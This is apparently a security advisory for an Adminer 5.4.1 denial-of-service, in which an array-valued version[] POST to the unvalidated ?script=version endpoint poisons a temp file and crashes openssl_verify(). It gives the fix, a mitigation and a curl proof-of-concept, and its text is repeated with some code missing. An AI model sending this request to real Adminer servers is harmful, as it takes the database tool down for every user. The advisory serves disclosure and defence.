Summary
Adminer v5.4.1 has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users.
Fix
Upgrade to Adminer 5.4.2.
Mitigation (if you can't upgrade): Make file adminer.version in temp directory (usually the value of upload_tmp_dir) unwritable by web server.
Details
1. Intended design of ?script=version:
The endpoint is designed to receive version data from adminer.org via browser JavaScript:
functions.js line 102-117: Creates iframe to https://www.adminer.org/version/- Adminer.org sends signed version data via
postMessage
- JavaScript POSTs this to
?script=version
- Server stores in
/tmp/adminer.version for signature verification
// functions.js line 117
ajax(url + 'script=version', () => { }, event.data + '&token=' + token);2. The vulnerability:
The endpoint only checks $_GET["script"] == "version" - it does not validate:
- Request origin (no CSRF token check for this endpoint)
- Request source (any HTTP client can POST)
- Parameter types (
version expected as string, array not rejected)
// bootstrap.inc.php line 32-40
if ($_GET["script"] == "version") {
$filename = get_temp_dir() . "/adminer.version";
@unlink($filename);
$fp = file_open_lock($filename);
if ($fp) {
file_write_unlock($fp, serialize(array("signature" => $_POST["signature"], "version" => $_POST["version"])));
}
exit;
}3. Type confusion crash:
When POST contains version[] instead of version, PHP creates an array. When Adminer reads this file and passes to openssl_verify():
// design.inc.php line 75
if (openssl_verify($version["version"], base64_decode($version["signature"]), $public) == 1) {PHP 8.x throws:
TypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given
PoC
Steps to Reproduce:
Step 1: Verify Adminer is running and accessible.
curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.phpExpected output:
Step 2: Send the malicious POST request. The version[] syntax causes PHP to create an array instead of a string.
curl -X POST "http://localhost:8888/adminer-5.4.1.php?script=version" \
-d "signature=x&version[]=INJECTED"Expected output: Empty response (no error).
Step 3: Access Adminer again to trigger the crash.
curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.phpExpected output:
Step 4: (Optional) View the PHP error in server logs.
PHP Fatal error: Uncaught TypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given in adminer-5.4.1.php:1386
Step 5: (Optional) Inspect the poisoned file.
Expected output:
a:2:{s:9:"signature";s:1:"x";s:7:"version";a:1:{i:0;s:8:"INJECTED";}}
Recovery:
After deletion, Adminer returns HTTP 200.
Impact
Type: Denial of Service
Root cause: The ?script=version endpoint is designed to receive data from adminer.org via JavaScript, but lacks server-side validation. Any HTTP client can POST directly to this endpoint. Combined with missing type validation before openssl_verify(), this allows persistent DoS.
Affected users: Any Adminer instance accessible over the network.
Summary
Adminer v5.4.1 has a version check mechanism where
adminer.orgsends signed version info via JavaScript postMessage, which the browser then POSTs to?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POSTversion[]parameter which PHP converts to an array. On next page load,openssl_verify()receives this array instead of string and throwsTypeError, returning HTTP 500 to all users.Fix
Upgrade to Adminer 5.4.2.
Mitigation (if you can't upgrade): Make file
adminer.versionin temp directory (usually the value of upload_tmp_dir) unwritable by web server.Details
1. Intended design of
?script=version:The endpoint is designed to receive version data from
adminer.orgvia browser JavaScript:functions.jsline 102-117: Creates iframe tohttps://www.adminer.org/version/postMessage?script=version/tmp/adminer.versionfor signature verification2. The vulnerability:
The endpoint only checks
$_GET["script"] == "version"- it does not validate:versionexpected as string, array not rejected)3. Type confusion crash:
When POST contains
version[]instead ofversion, PHP creates an array. When Adminer reads this file and passes toopenssl_verify():PHP 8.x throws:
PoC
Steps to Reproduce:
Step 1: Verify Adminer is running and accessible.
curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.phpExpected output:
Step 2: Send the malicious POST request. The
version[]syntax causes PHP to create an array instead of a string.Expected output: Empty response (no error).
Step 3: Access Adminer again to trigger the crash.
curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.phpExpected output:
Step 4: (Optional) View the PHP error in server logs.
Step 5: (Optional) Inspect the poisoned file.
Expected output:
Recovery:
After deletion, Adminer returns HTTP 200.
Impact
Type: Denial of Service
Root cause: The
?script=versionendpoint is designed to receive data fromadminer.orgvia JavaScript, but lacks server-side validation. Any HTTP client can POST directly to this endpoint. Combined with missing type validation beforeopenssl_verify(), this allows persistent DoS.Affected users: Any Adminer instance accessible over the network.